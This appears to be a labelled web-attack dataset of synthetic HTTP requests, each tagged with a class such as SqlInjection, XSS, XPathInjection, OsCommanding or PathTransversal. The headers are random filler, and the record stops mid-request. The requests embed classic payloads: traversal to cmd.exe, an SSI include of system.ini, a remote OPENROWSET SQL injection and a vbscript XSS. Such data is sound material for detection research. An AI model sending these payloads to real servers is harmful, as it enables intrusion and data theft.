GET /mtro2/rt0ma7ak4rcrnet/eflroI0/egInprriRholh/oJIF/ojgXkKYnSt8K/ohe0reavs/z4ewVQjZ.cx/i7/e@8K42ByAbfdePah/lcbmnorOlh.aspx?smnudRtor=eAPwl_a&Taomt26ta=58249916&nztZikiaeA=7653&Afwi=a1%27%5D+%7C+++++P+++%7C+++++%2F%2Fuser%5B+++++name%2Ftext%28++%29+%3D++%27pdhto&ns24sh=945&43ltidsenioeE=i%2Fn4oln9eeTtelnetk%2F&dsr=3597&ecmhiesrn509aro=9178742653&QRxO=tbiydItns7sane&Eoy0ie=507&SticaartC=40toj7 HTTP/1.1
Host: 226.42.38.230:80
Connection: rajheoii
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ok-tt3iic, l-ocna;q=0.6, zwhkehn-scs8Xohr;q=0.3, po-Yts;q=0.6, ylo1-awrdeywc
Cache-Control: max-stale=8199
Client-ip: 176.183.31.155
Cookie: suo16n=6w;lehh=htr/&l\0d5R'2nc f;rsbdibdrn=cnoadhn;IkoclHn6=n;etfylenitsyfld0=mejgGAcyGZYw;e5GeoAi=691
Cookie2: $Version="246"
Date: Sat, 19 Dec 09 19:20:26 GMT
ETag: "lvJg@fQtPGfZPSNn"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 05 Jun 05 22:51:42 CET
If-Unmodified-Since: Tue, 06 Jul 04 10:21:15 UTC
If-Match: "sTKGR4P0AoW3qO_Opg"
If-None-Match: "5RjGOh8LcKVKM5_F1h6"
If-Range: *
Max-Forwards: 81
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: NTLM d3R2YXNham9sWXduYnR0aHk2dzlpbG91OWV0c3Z2T2R0ZXJKa29lZmw=
Range: -31
Referer: http://ueih2t.biz/aAcqah/ian8oEdd/wtarAurt/htxctlHt/aufozdr.sh
TE: chunked
Trailer: Via
User-Agent: oabadt2mt (iYdZjZ)
UA-CPU: StrongARM
UA-Disp: 081,2723,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: nsuaH; 3s9hHi=neitt
Upgrade: sfltc/9.5, Llja/5.6
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49034
Start - Id: 36492
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: 132.157.168.149
Connection: eecea
Accept: audio/*;q=0.0, image/*
Accept-Charset: windows-1250, big5, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=7347
Client-ip: 219.137.139.146
Cookie: flEA=hlib1se;tawiteenmei=iomh
Cookie2: $Version="38"
Date: Sat, 21 Oct 06 20:03:28 GMT
ETag: "EEjfH1qoZefe@m2kmR"
Expect: toexim=komsian;tOnhH
From: hzswjOi@8ihng.biz
If-Modified-Since: Sun, 26 Sep 04 13:52:36 GMT
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "8NqOGhZtd.10osrYsCUi"
If-None-Match: *
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 960
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: NTLM YmFhcmdhbWd2ZXNxMmU0bzdmbnhpYWliaWVUaW9vYWF0QmVhZXRHRTA=
Range: 998505-,-0540,815-
Referer: /Easti/aibmuwhl/tdax/raeersna.php4
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 3.6; to-lm; rv:3.0.1) Gecko/27650237
UA-CPU: MIPS
UA-Disp: 900,140,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 512x1298
Via: HTTP/6.9 www.rotod.css
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36492
Start - Id: 46957
class: XSS
POST /@3c8S4/eoaxs4Ahte/2Zb/Uautoexect.NuuY3CHdX@/af/87Aeoopw3u3Zi/ZBAxl1bnf.jsp? HTTP/1.0
Content-Length: 393
Content-Language: 8thEtlh,wm,shnu
Content-Encoding: identity
Content-Location: http://CpfEj.net/h7qul/eiAbeia.exe
Content-MD5: SWluOG9xb2VqOGphN3VnaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Apr 05 08:29:42 GMT
Last-Modified: Sat, 09 May 09 01:41:35 UTC
Host: www.oeepi.com
Connection: p02tt
Accept: audio/*;q=0.1, application/*;q=0.0, image/*
Accept-Charset: iso-2022-jp, iso-8859-8, x-mac-korean, ks_c_5601-1987, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 15.111.69.143
Cookie: drVFelniocUdi=A drfe;1ytspu2=fselectis'r=q2te0d;fdtni4khi=je09lr;isClisslKenratq=2026474687;nrta=wUE;5ZXCCtONUv4P=451
Cookie2: $Version="609"
Date: Wed, 27 Apr 05 10:48:07 UTC
ETag: "NViduy7oqvlSc-i"
Expect: evean=mohg7n;noLnieD
From: trhir@9toer.gov
If-Modified-Since: Fri, 09 May 08 07:46:37 GMT
If-Unmodified-Since: Fri, 17 Dec 04 07:22:30 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Mar 10 13:20:16 UTC
Max-Forwards: 709
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic b2hpb246UnlyOU9xZA==
Authorization: echMmd VljPnr=nbrGo
Range: 7-,-974,384-64
Referer: /onnu/5ecseo.cgi
TE: trailers
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 5.4; pi-tF; rv:6.2.7) Gecko/84237219
UA-CPU: StrongARM
UA-Disp: 698,9133,32
UA-OS: FreeBSD
UA-Color: color16
Via: HTTP/9.5 94.53.182.200
Transfer-Encoding: gzip
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zsos8ee4aa0rdaf=e;&otscpe5e=1589172656&etrEssue7ol=c2gtbu6sctI3eualsu&hTnUn7qb=kaic4rfsnna5icf&o-qynetcatk_.eval=neqbetween~yoenheaodiRre0a&riXrttcnh3uce=w ldI&d4aiEhoecr0e=<iframe src =    "  vbscript:[alert    ('i8masTuS');]     "   >&QGaTYCOYVgroup byB=sBjArW&reP5cJciaqevso=tt  tae0iN&pai=j8OeetgoJiO1perp&mqil0k9=wQKvDbvV&fUturh=t oh'm6t u&wfECpange=160657

End - Id: 46957
Start - Id: 35607
class: XPathInjection
GET /yqiLw5ipspe7rcpiheun.js?cs2nbtxenlreE=RortasnxmheStqget&tjlkG=ian6spu%28tr9e&atEmmne0=essthE9A9n&otemexonnaset=54331&guoegetrngtdxe=hYKg2I8Why&iseh9e=dxP_gN4MM&Y9yX=ke9Hsamstb&gsp=anloAo3aspidte&Za8bnoddg=rd%7E&uQLEreplaceCX-BcLlog=9+or+++1%3C+1bgvw%2FQei%2Fnt%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D385%5D++or+++67036%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&hnddanbo1brtbns=window.openojd%3D&ab0p=iu HTTP/1.1
Host: 235.51.109.165
Connection: dx4lned
Accept: application/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: t-seamihie;q=0.1, iN-euhee5r, rirelh-v;q=0.7, vteeo-tpwd9s
Cache-Control: n6='a9'
Client-ip: 71.205.202.98
Cookie: eaep=buiTbu2Taeuaev;0eminsFehotoiE=soN;gceptarmAx=rnH(x?rhomeaail
Cookie2: $Version="6"
Date: Thu, 13 Sep 07 15:07:28 UTC
ETag: W/"61HzeJ@rKHFyCN-"
Expect: 100-continue
From: oiekA@q3dEy.org
If-Modified-Since: Wed, 07 Mar 07 10:37:39 UTC
If-Unmodified-Since: Thu, 08 May 08 11:29:37 GMT
If-Match: *
If-None-Match: *
If-Range: "X@7uJwphzcqAWxX"
Max-Forwards: 409
MIME-Version: 4.8
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: Basic dEFZd3I6c2VhYQ==
Range: 1278-6
Referer: /8yie/8aeievn/irEyyeii/a7qeorns/krtw.php
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.8 (X11; U; Open BSD i386 9.2; ii-uw; rv:2.3.0) Gecko/42716959
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 138x439
Via: 3.6 171.109.199.195, HTTP/5.5 72.120.91.146
Transfer-Encoding: gzip
Upgrade: eto3T/9.1, 9rfo3l/2.2, nuUaek/3.0
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 28.16.209.118
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35607
Start - Id: 43984
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 157.211.238.159
Connection: eetueam1
Accept: */*;q=0.5
Accept-Charset: iso-8859-7;q=0.1, macintosh;q=0.8, windows-1257
Accept-Encoding: *
Accept-Language: ycds2t-oe, hthnVet-thhi;q=0.1, 1I-2te;q=0.8
Cache-Control: max-stale
Client-ip: 60.172.21.158
Cookie: lRtftdiaos=l5ldropt;nattts=e/;V9ftpNpassthruBnull=~ p;RnSq1e8e=e3y0e5ai
Cookie2: $Version="148"
Date: Fri, 01 Apr 05 11:54:02 CET
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Wed, 10 Jun 09 21:13:12 CET
If-Unmodified-Since: Mon, 14 Aug 06 01:46:33 CET
If-Match: "0HCku5I6FQGDVvH"
If-None-Match: "uY20zzYkeH0twEb"
If-Range: "xP75Aa9058Vh6nUsJeL"
Max-Forwards: 37
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Digest opaque="rpcs"
Range: -2,795-,-91
Referer: /rirepzi.php3
TE: trailers
Trailer: Referer
User-Agent: ayhiscmho (ue@u-e; iuSUK92)
UA-CPU: x86
UA-Disp: 603,719,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.5 68.98.66.251, 2.3 www.ouisohz3.jpg
Transfer-Encoding: identity
Upgrade: dsss/1.1, o8rt/7.8, 7ln/9.8
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43984
Start - Id: 44941
class: PathTransversal
GET /ee4hzi/rTsa/v.evrr/zEaWMKHd@oD/nLxDP77VcQBiDp71leo/a_tayOO/H7/Cti1e9Cyo/yIdelete5U-/hjeEistngco/hmLToACZpiVpa/oMlpH4B_.gif?jsngilnrn=doc%28++file%3A%2F%2F%2Fc%3A%2Feynt%2Fat1eeta.xml++++%29&4J@nc_@sN6=tunsgrhhrReuhaqry HTTP/1.1
Host: www.snltsed.ch
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *;q=0.5
Accept-Encoding: identity, deflate, gzip
Accept-Language: *
Cache-Control: plfa='aa66tn8u'
Client-ip: 92.170.136.192
Cookie: fotThYlbs=o9otySnW;sexrBwjtOciN=childitdyF;inhxmara=Tota;e4ElpaRn=90492
Cookie2: $Version="776"
Date: Fri, 20 Nov 09 24:20:12 GMT
ETag: W/"FTabip4q-bvxfAK_"
Expect: olpham=dewefu
From: idto@ug5qpuenx6.org
If-Modified-Since: Sat, 19 Jan 08 16:02:52 UTC
If-Unmodified-Since: Sat, 12 Sep 09 18:10:48 UTC
If-Match: "V@NlObOh6h9Xa1D"
If-None-Match: "1z7E2N9Lg@uLveYI"
If-Range: Mon, 10 May 04 05:39:10 UTC
Max-Forwards: 14
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="cFbf2F57cDDF4E7Ed19bE92BCEa0ec12"
Authorization: iaweD nleptOe=4ijclSgY
Range: 032407-30
Referer: http://KK3ed1t.cz/9nqeHr/rusc.js
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: omtai/8.4.0.8
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2762x370
Via: HTTP/3.9 5.50.89.38
Transfer-Encoding: gzip
Upgrade: stntow/3.4, 4egw/7.2
Warning: 151 7.22.89.225 "tqonsaseaLehs" "Fri, 02 Feb 07 23:07:17 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44941
Start - Id: 36446
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.es1yra.com
Connection: keep-alive
Accept: audio/basic;q=0.1, audio/*, application/postscript;q=0.6
Accept-Charset: iso-8859-9;q=0.0, x-mac-greek;q=0.0, windows-1253
Accept-Encoding: gzip;q=0.0, identity, identity
Accept-Language: i7t-o3hhr;q=0.9, p-e;q=0.9, amns-ecrwf;q=0.3
Cache-Control: no-cache
Client-ip: 144.216.33.215
Cookie: plnihGa3d=4%[ey
Cookie2: $Version="817"
Date: Fri, 20 Aug 04 20:31:48 GMT
ETag: W/"QcQUC6TnA4cSdTY9asB"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Sun, 04 Jan 09 18:51:01 CET
If-Unmodified-Since: Sat, 28 May 05 14:28:11 CET
If-Match: *
If-None-Match: "WMQSazlu06TWlpGTgg"
If-Range: Tue, 08 May 07 18:49:49 UTC
Max-Forwards: 300
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Digest qop=auth-int
Range: 336-,5495-71936
Referer: http://www.tiecwuOn.st/erEdet.gif
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: 7rfmca/9.9
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: FTP/6.0 109.251.5.132, FTP/1.9 124.107.204.229
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 92.128.39.126
----: ---------------------------

null

End - Id: 36446
Start - Id: 36998
class: LdapInjection
GET /dkNdereeh/ageEtbsFC/kRYrmkMub0tmp8NGacceptM/t7y8QySPIPpsD3/iaHee3t/lcOP8LhRktoBE/w9nreentn/Feoslidh/t.vL6iUB/oG/Y0i0/ithWBAcMUkrNKTG.png?koszaLeoHepe=1irmse8AtmpgrU&hit=%29+%28+%7C++++%28hoen%3Df1*%29&mHe0esp=9391676&apot1=uPIz4f7cHrYQ&aerlqeskhofsslr=2413&ao=298823&iyheteaiorp0h=dhidx1t2urt HTTP/1.0
Host: www.7gsivreee.biz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: 6b1-g2e, rmS0-iot, C-ecg, awsnin-9oecdJ, 8o-ietD4c5;q=0.6
Cache-Control: max-age=12152
Client-ip: 9.220.179.73
Cookie: edNod9ncnupnoiT=li:ot)link
Cookie2: $Version="23"
Date: Sun, 14 Nov 04 06:19:07 GMT
ETag: "B8E.sqhQTxd1WRrRZqJv"
Expect: 100-continue
From: nlnE@rejed1gea.uk
If-Modified-Since: Sun, 20 May 07 17:39:42 CET
If-Unmodified-Since: Sat, 16 Apr 05 19:27:18 GMT
If-Match: *
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Thu, 04 Nov 04 14:20:29 GMT
Max-Forwards: 502
MIME-Version: 5.8
Pragma: 94o8dm='fn'
Proxy-Authorization: wXdaMt sohtZ=zc5ittfu
Authorization: Basic ZXJldDpNc3R1
Range: 11-,-9658
Referer: http://l1pa.be/s7hostzk/ehikza.css
TE: gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 4.3; iw-aa; rv:5.2.2) Gecko/99247209
UA-CPU: PowerPC
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: compress
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 919 www.v8i3eh.html "hterlDuo" "Fri, 28 Oct 05 03:05:23 GMT"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36998
Start - Id: 49211
class: XPathInjection
GET /eACs.shtml?MJARavN1bkm=%2FMsu+ii%5Bnetmp&1gtFt3OrL=%28i+%3C++++count%28iIess%2Fchild%3A%3Atext%28%29%29+and+++++j+++++%3C+++++count%28Re%2Fchild%3A%3Acomment%28%29%29+++++and++k++++%3C+count%28h5ihn%2Fchild%3A%3A*%29++++%29&ecornqcrn=5075&oeriaiPf=4ahO%2B HTTP/1.1
Host: www.esosE.biz
Connection: ealphca
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 107.0.134.67
Cookie: dyRecrlnddaulH=ontaieah;5XZcR=formAusA=n4plwot;LNB@PQEUUvu=e(nf;cvrh6eds=>);hdm=3;sMb5oyocnp=046918
Cookie2: $Version="19"
Date: Mon, 03 Nov 08 03:19:27 CET
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Sun, 02 Oct 05 15:36:30 GMT
If-Unmodified-Since: Tue, 23 Nov 04 18:26:08 GMT
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: Sun, 29 Mar 09 05:49:59 UTC
Max-Forwards: 889
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Digest nonce
Range: -392691
Referer: /hooz/rxHjwamo/t00Ng.css
TE: gzip;q=0.4,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/5.6 (Windows; U; WinNT 7.4; st-tn; rv:6.7.3) Gecko/77918675
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.2 25.152.84.181, 2.1 135.117.29.145, FTP/4.0 230.172.96.139
Transfer-Encoding: aofh
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49211
Start - Id: 43855
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 94.145.36.220
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic, isiri-3342, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=771
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Wed, 05 Jul 06 01:01:05 GMT
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 15 Apr 08 02:05:54 CET
If-Unmodified-Since: Wed, 12 May 04 03:05:51 UTC
If-Match: "iT.aZsHebK.VkG68xcBy"
If-None-Match: *
If-Range: *
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: tf1et Eejuotis=rwaduier
Range: 064373-124259,214-265,801-679
Referer: http://www.Tdoeekb.net/aasd/9rtah/karepB/ik91ce/8dae.gif
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 8.6; gI-i1; rv:8.0.7) Gecko/16895851
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: FTP/3.8 242.139.29.49:46381, HTTP/1.2 www.pdad.shtml, 9.8 www.ltntihk.jpg
Transfer-Encoding: tdfaN
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 623 www.ednk.css "ctoro1sddstfeDiliter" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43855
Start - Id: 42130
class: SqlInjection
GET /onu/NReil/id/gSQAtitC2l2XJNbq/r2.php3?2tbioilm=67&5eu2hoeah=627&Horcirfrootr=Etefnnsro&n6ir=70&t5a4bmdy=oihdiI&aalwDo=x&noang=%3B++insert+++into++++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3Dfeetq%3Bpwd%3DHli%3BNetwork%3DDBMSSOCN%3BAddress%3D150.48.165.200%2C1433%3B%27%2C%27select++*+++from++++_sysdatabases%27%29%3B+++++select++++*+++++from+++++LinkedOrRemoteSrv1.master.dbo.sysdatabases&lnfeaattkE=68&bbtrY=lYetH&c1siais=e+%3Aei HTTP/1.1
Host: www.etdwisT.st
Connection: close
Accept: application/x-tar;q=0.9, audio/basic, text/html;q=0.6
Accept-Charset: big5, gb2312;q=0.0
Accept-Encoding: 
Accept-Language: a7-g;q=0.3, losteend-lEsxzgai, a0de-nTjiott;q=0.8
Cache-Control: eHeirCti=mctalt
Client-ip: 17.1.72.59
Cookie: ta6rbcvehhnec=o8an;ga6gna=7gI;1TmoergmIshnc=inwo-VuSrJp;ie8z0iuStr=2469336;tentren1crnedai=whglET:m0se;nd3u4h=4
Cookie2: $Version="9"
Date: Wed, 30 Mar 05 18:43:50 CET
ETag: "36ABV77V@jd_sdUj"
Expect: ahiWkN=nO6ei
From: 8EqrmfL@m6me9i3j.cz
If-Modified-Since: Fri, 08 Sep 06 13:58:39 CET
If-Unmodified-Since: Tue, 19 Jun 07 20:21:13 GMT
If-Match: *
If-None-Match: "95dITTUXPTlgzhu_OY"
If-Range: "-t@QcvOSPbfghpj2hrd."
Max-Forwards: 309
MIME-Version: 7.0
Pragma: l9g=g
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=95C88C7A
Range: 80-3804,023297-91,09-
Referer: /odv2coe.php3
TE: deflate;q=0.7
Trailer: Range
User-Agent: mbtun3sdHt7h
UA-CPU: StrongARM
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 636x9570
Via: HTTP/0.1 www.xang.gif, iay/2.4 160.19.139.125:6
Transfer-Encoding: deflate
Upgrade: teh/9.0, ittnn/5.6, ohtcp/8.9
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42130
Start - Id: 42232
class: SqlInjection
GET /acadl@ef/nPBMd54RsRZiGe6kP.png?vaeihedeNuwe=9&wieuncnihlhyl=qwer%27+or+++rhol9e_v.Account%3D%27f4R%40sieo4i.com&d4waotlclot=13867&u8h=cr%28&nlsenc=hXI4ii3ODS&IOc0p=2&iflfa61n=ces0u&eeae=919357&Vftp.R=sjpbh&ozboa=16170&errzcheNocne5=e5nyeeohjilNiAt&dt=6QMzOP2URK&ne43xo05eut=aMw7g88O7&m0pvea2dpo2mana=jtselectoa HTTP/1.0
Host: 14.229.140.116:58869
Connection: keep-alive
Accept: video/*;q=0.9, video/mpeg, text/plain
Accept-Charset: windows-1252, x-mac-roman
Accept-Encoding: *
Accept-Language: asvrtxw-Ilkd
Cache-Control: DnitN=ndsl
Client-ip: 25.90.218.25
Cookie: qinlra0e=3888;rsoshs=0497;1s=59297554;empm=36017;hsEe2ia=o;hhh_8objectfZ=p bco
Cookie2: $Version="306"
Date: Sat, 16 Jan 10 06:01:09 GMT
ETag: W/"tbUtlhiPLZRVIV-SX.zT"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Wed, 17 Jan 07 10:38:58 CET
If-Unmodified-Since: Thu, 07 Jun 07 11:18:37 GMT
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: "pv@qrWadt1tIHUizA"
Max-Forwards: 8764
MIME-Version: 1.3
Pragma: 0tmeey=wlEwgsir
Proxy-Authorization: Digest cnonce="trns"
Authorization: Ciye eo2eed9t=torumset
Range: 4539-14148,-19,934-
Referer: http://uetata.ch/nGdmt.cgi
TE: chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 8.1; s1-ms; rv:2.1.6) Gecko/27221034
UA-CPU: x86
UA-Disp: 378,9839,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: HTTP/2.8 www.i4itnc.tiff, ehr/9.0 www.icnmty1e.tiff, 8.5 www.nteomwen.css
Transfer-Encoding: drmito; 7hrdthc=indonCo
Upgrade: iunoNg/9.6
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42232
Start - Id: 40423
class: SSI
POST /t.LOspOxb_Sgr3SM/ya.shtml? HTTP/1.1
Content-Length: 123
Content-Language: te
Content-Encoding: gzip
Content-Location: /hann.jpeg
Content-MD5: bmxhYXM3ZTZuYW5lbVNwRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Nov 07 05:03:36 GMT
Last-Modified: Mon, 05 Oct 09 03:14:16 UTC
Host: www.hitimrtp.ch
Connection: close
Accept: application/*
Accept-Charset: euc-jp, iso-8859-1;q=0.0, windows-1252, x-mac-ce
Accept-Encoding: gzip;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 58.132.221.105
Cookie: giinietfn=eYXai5qas;IbthAb=Rrostuftr2brreop;Ihet2gstdLb=8720625175;6f0oFh=9105074051
Cookie2: $Version="70"
Date: Wed, 24 Dec 08 15:19:01 CET
ETag: W/"ArG8AqvI0qTySIItp3u_"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Tue, 13 Jan 04 01:51:05 CET
If-Unmodified-Since: Mon, 28 Aug 06 02:52:15 UTC
If-Match: "MZS7axyKfcMF7l_CPa"
If-None-Match: *
If-Range: *
Max-Forwards: 637
MIME-Version: 5.8
Pragma: nn9=t6rl0reu
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic N29laXFlZGg6b3N5dWlSaDk=
Range: 11-84,2848-,953675-
Referer: /etyofhsd/lki5f.nsf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 8.0; tn-rd; rv:9.5.0) Gecko/40526187
UA-CPU: 68000
UA-Disp: 8347,1094,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 132x4219
Via: 0.3 158.158.244.222
Transfer-Encoding: compress
Upgrade: ufb/8.5, d45i3/7.9
Warning: 529 www.od0axrnr.html:377 "crrssos" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

lDhoeoeefdp=q]aeet(8eeetcs>%gh&vtds5=7&si=<!--  #include    virtual="c:\winnt\system.ini"   -->

End - Id: 40423
Start - Id: 44756
class: PathTransversal
GET /9fynooy/fvgyaI/arleeldoocl/positionhttpsidA-x_LL9ft.css?OT4evalQjA=630332&noir=collection%28file%3A%2F%2F%2Fc%3A%2Fnta%2Fr9trixeb.xml+++%29&Hqulls=aHxoitsamn+w7Tea HTTP/1.1
Host: www.zwadoNdfYL.ch
Connection: upia
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 245.254.197.131
Cookie: ozoaa=6iH9BoQD;jpv1huee=igx@;ia=fetcifobidivsr+\u
Cookie2: $Version="28"
Date: Fri, 28 Jul 06 09:39:09 CET
ETag: W/"xb-ZO.Nm0QQKMM6"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Thu, 15 Apr 04 13:45:47 CET
